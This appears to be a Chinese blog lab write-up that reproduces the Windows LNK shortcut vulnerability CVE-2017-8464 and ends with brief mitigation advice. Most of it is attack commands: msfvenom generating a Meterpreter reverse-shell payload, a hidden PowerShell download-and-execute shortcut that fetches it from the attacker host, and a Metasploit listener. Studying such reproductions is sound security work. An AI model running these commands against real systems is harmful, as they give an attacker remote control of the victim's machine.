CVE-2017-8464(震网三代)漏洞分析与复现
目录
一、CVE-2017-8464漏洞简介
1、简介
2、CVE-2017-8464漏洞原理
3、漏洞影响范围
二、复现环境
三、漏洞复现
1、kali下生成一个反弹的ps1的shell,文件名为search.ps1在目录/opt下
2、切换到/opt目录下,然后查看到已生成了search.ps1 的powershell 后门,移动search.ps1至/var/www/html目录下
3、启动apache服务,然后使用本地浏览器登录看apache是否启动成功,成功的截图如下
4、靶机建立快捷方式,右键-新建-快捷方式
5、kali进入msf,创建监听反弹
6、使用exploit或run命令进行攻击
四、CVE-2017-8464漏洞怎样解决
一、CVE-2017-8464漏洞简介
1、简介
2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
2、CVE-2017-8464漏洞原理
Windows系统使用二进制解析 .LNK文件,当恶意二进制代码被系统识别执行时即可实现远程代码执行,由于是在explorer.exe进程中运行,所以 load 进内存时与当前用户具有相同权限。
攻击者利用这一解析过程将包含恶意二进制的代码被附带进可移动驱动器(或远程共享过程中),受害者使用powershell解析 .LNK 文件后即被黑客所控制。
3、漏洞影响范围
该漏洞影响从Win7到最新的Windows 10操作系统,漏洞同样影响操作系统, 但不影响XP 2003系统。
二、复现环境
攻击机:kali-Linux-2022.2(IP:192.168.50.133/24)
靶机:windows7 64位(IP:192.168.50.159/24)
kali-Linux-2022.2镜像下载地址:Get Kali | Kali Linux
Windows 7镜像下载地址:MSDN, 我告诉你 - 做一个安静的工具站
两个虚拟机肯定要相互ping通,靶机关闭防火墙和杀毒软件
三、漏洞复现
注意:接下来命令中配置的IP地址均为kali-Linux-2022.2的IP地址,后面配置的端口要与第一步配置的端口保持一致,端口不一致会出现问题
1、kali下生成一个反弹的ps1的shell,文件名为search.ps1在目录/opt下
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.50.133 lport=5555 -f psh-reflection > /opt/search.ps1
2、切换到/opt目录下,然后查看到已生成了search.ps1 的powershell 后门,移动search.ps1至/var/www/html目录下
cd /opt
ls
mv search.ps1 /var/www/html
3、启动apache服务,然后使用本地浏览器登录看apache是否启动成功,成功的截图如下
service apache2 start
192.168.50.133/search.ps1
4、靶机建立快捷方式,右键-新建-快捷方式
powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.50.133/search.ps1’);test.ps1”
快捷方式建立成功
5、kali进入msf,创建监听反弹
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set lhost 192.168.50.133
set lport 5555
6、使用exploit或run命令进行攻击
exploit
在windows7上运行你之前创建的快捷方式(双击),反弹shell,漏洞复现成功
四、CVE-2017-8464漏洞怎样解决?
对于无法及时更新补丁的主机,我们建议采用如下的方式进行缓解:震网三代LNK文件远程代码执行漏洞(CVE-2017-8464)建议在服务器环境执行以下缓解措施:禁用U盘、网络共享及关闭Webclient Service。请管理员关注是否有业务与上述服务相关并做好恢复准备。Windows搜索远程命令执行漏洞(CVE-2017-8543)关闭Windows Search服务.
CVE-2017-8464(震网三代)漏洞分析与复现相关推荐
- CVE2017-8464:震网三代漏洞分析
CVE2017-8464:震网三代漏洞分析(转) 转载 本文由Kilig原创发布 转载,请参考转载声明,注明出处: https://www.anquanke.com/post/id/214846 安全 ...
- MS08-067漏洞分析与复现
一名网络空间安全专业学生所做的漏洞复现实验,如有错误或有待改进的地方,还请大家多多指教. MS08-067漏洞分析与复现 目录 MS08-067漏洞分析与复现 1 前置知识 2 漏洞简介 3 漏洞代码 ...
- java 漏洞复现_CVE-2019-12384漏洞分析及复现
原标题:CVE-2019-12384漏洞分析及复现 *本文中涉及到的相关漏洞已报送厂商并得到修复,本文仅限技术研究与讨论,严禁用于非法用途,否则产生的一切后果自行承担. 引言 近期关于Jackson的 ...
- CVE-2017-8464震网3.0漏洞分析与复现
概述:微软在2017年6月份的补丁中修补了一个快捷方式(CVE-2107-8464)的漏洞,公告称此漏洞被国家背景的网络攻击所使用来实施攻击,该漏洞也被称为震网三代,随后Metasploit上发布了该 ...
- CVE-2020-1472 Netlogon特权提升漏洞分析及复现
0x01漏洞背景 NetLogon远程协议是一种在Windows 域控上使用的RPC 接口,被用于各种与用户和机器认证相关的任务.最常用于让用户使用NTLM协议登录服务器,也用于NTP响应认证以及更新 ...
- ThinkPHP V5.0.5漏洞_ThinkPHP 5.x 远程命令执行漏洞分析与复现
php中文网最新课程 每日17点准时技术干货分享 0x00 前言 ThinkPHP 官方 2018 年 12 月 9 日发布重要的安全更新,修复了一个严重的远程代码执行漏洞.该更新主要涉及一个安全更新 ...
- Apache Commons Collections反序列化漏洞分析与复现
聚焦源代码安全,网罗国内外最新资讯! 1.1 状态 完成漏洞挖掘条件分析.漏洞复现. 1.2 漏洞分析 存在安全缺陷的版本:Apache Commons Collections3.2.1以下,[JD ...
- Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现
0x01 漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单.有效.统一的 ...
- 震网三代漏洞复现(CVE-2017-8464)
文章目录 影响版本 危害 漏洞原理 漏洞复现 任务环境 创建EXP 获取靶机权限 利用Powershell获取权限 修复建议 影响版本 Windows 7Windows 8.1Windows RT 8 ...
最新文章
- Science:穿梭于个体大脑与群体大脑之间探索社会智能
- ansible及ansible-palybook使用(持续更新)
- SAP 金额在表中的存储及货币转换因子
- 世界坐标系,相机坐标系和图像坐标系的转换(Python)
- python设置循环范围_python – 如何检查循环范围的重叠(重叠的年度循环周期)
- 浅谈ASP.NET 4中构造“.NET研究”HTML5视频控件
- 三角形旋转c语言程序,c语言图形,请高手修改,效果是一个三角形绕一点旋转一周...
- 【卷积神经网络】ResNet翻译详解
- 2018级软件秋季总结
- 关于XML序列化与CultureInfo
- 打包vue项目时报错:Expected indentation of 6 spaces but found 10
- unity, 欧拉角(euler angle)
- 电商网站主动取消客户已支付成功订单感想
- 学生用计算机方着怎么计,科学计算器使用
- php自定义建站系统,PbootCMS(开源免费PHP建站系统) V2.0.9 官方版
- 使用CCleaner删除系统还原点
- 产品读书《人人都是产品经理 1.0》
- JavaSE基础知识回顾
- Java虚拟机学习笔记(一)--运行时数据区域
- 黑鲨3怎么安装鸿蒙系统,黑鲨3 Pro机械按键详解,横握时可进行高频点击操作
热门文章
- 电气专业出来如何月入过万?
- 华为鸿蒙系统学习笔记1-介绍
- 单例模式-基类单例。。用于其他单例的派生
- vue整合videojs插件,播放RTMP,hls直播视频
- Golang:实现断点续传(复制文件)
- 《Effective C++》学习笔记(条款25:考虑写出一个不抛异常的swap函数)
- 拓扑排序之AOV,关键路径之AOE
- 计算机专业无领导小组面试题,2015年事业单位招聘(无领导小组讨论)面试真题及真题分析(一)...
- RabbitMQ-1-概念及简单应用
- 正规python培训价格多少